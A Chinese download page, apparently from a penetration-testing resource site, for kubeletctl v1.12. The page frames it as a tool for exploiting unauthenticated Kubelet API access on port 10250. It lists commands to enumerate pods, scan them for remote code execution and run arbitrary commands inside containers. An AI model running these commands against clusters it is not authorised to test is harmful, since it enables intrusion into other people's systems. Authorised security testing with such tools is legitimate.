【Kubelet API未授权利用】Kubeletctl v1.12

简介

kubeletctl 是一个用于与 Kubernetes 中的 kubelet 进行交互的命令行工具。它提供了一种简便的方法来管理和操作 kubelet,包括获取节点信息、查看容器状态以及执行其他与 kubelet 相关的任务。通过 kubeletctl,用户可以更有效地监控和调试 Kubernetes 集群中的节点和容器。同时kubeletctl 还可以使用 RCE 扫描现有的容器,对于存在RCE的容器可以进行命令执行等多种功能。

需要注意的是,K8S环境中的Kubelet必须接受匿名访问(10250端口),才可以使用此工具进行利用。

使用演示

图片[1] - 【Kubelet API未授权利用】Kubeletctl v1.12 - 极核GetShell

快速使用

对目标K8S主机的Kubelet未授权进行利用,获取POD的信息

kubeletctl -s <IP> pods

对目标K8S主机的Kubelet未授权进行利用,使用RCE扫描存在的Pod

kubeletctl -s <IP> scan rce

对目标K8S中存在RCE漏洞的Pod进行命令执行

kubeletctl -s <IP> exec "<cmd>" -n <namespace> -p <pod name> -c <container name>

下载

✈️ 全球下载通道

🚀 极核加速通道

THE END
想说的话 1  QQ & 微信交流群: 点击查看加群方式
2  本站运营不易,以真心❤️换真心💕,如果帮助到你,可以 推荐给朋友 或者 开通金贝会员 支持一下本站!
3  请不要进行任何非授权的网络攻击,如果造成任何损失均由使用者本人负责,与本站和原作者无关!
点赞92 分享
【Kubelet API未授权利用】Kubeletctl v1.12 - 极核GetShell
【Kubelet API未授权利用】Kubeletctl v1.12
⭕此处是支付积分以获取极核加速下载通道,非强制购买!
💎您可以赞助本站,获取金贝会员畅享极核加速下载通道!
✔️在本文回复即可解锁全球下载通道!
10积分
付费阅读
茶谈区 共5条

请登录后发表评论